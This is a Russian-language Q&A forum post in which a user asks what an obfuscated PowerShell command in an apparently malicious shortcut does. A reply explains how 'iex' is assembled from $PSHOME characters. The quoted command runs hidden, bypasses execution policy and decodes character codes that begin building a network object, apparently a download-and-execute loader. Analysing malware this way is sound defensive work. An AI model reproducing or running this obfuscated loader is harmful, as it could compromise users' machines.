Powershell Join Puzzle

Question

Кто-нибудь знает, что делает следующий powerhshell? Я нашел ярлык, который кажется вредоносным, и его цель:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP  . ( $pshOmE[4]+$PShoMe[30]+'X') ( -JoiN( (44 ,141, 163,160 , 170 ,40 , 75, 40 , 50,50 ,116 , 145 ,167,55 , 117 , 142 , 152,145 , 143 , 164,40,123 ,171,163,164 , 145,155,56 ,116

Answer 1

Смотрите мой другой ответ . Сравните с другим ответом , iex (= выражение вызова) строится с помощью переменной $PSHOME (= $pshOmE[4]+$PShoMe[30]+'X'). Числа в команде соединения могут содержать либо расширенные символы ASCII, либо они могут быть закодированной командой Base64, которую можно использовать в форме с помощью powershell.exe -encodedCommand $encodedCommand (введите powershell.exe /? и приведёт к выводу примера).

Надеюсь, это поможет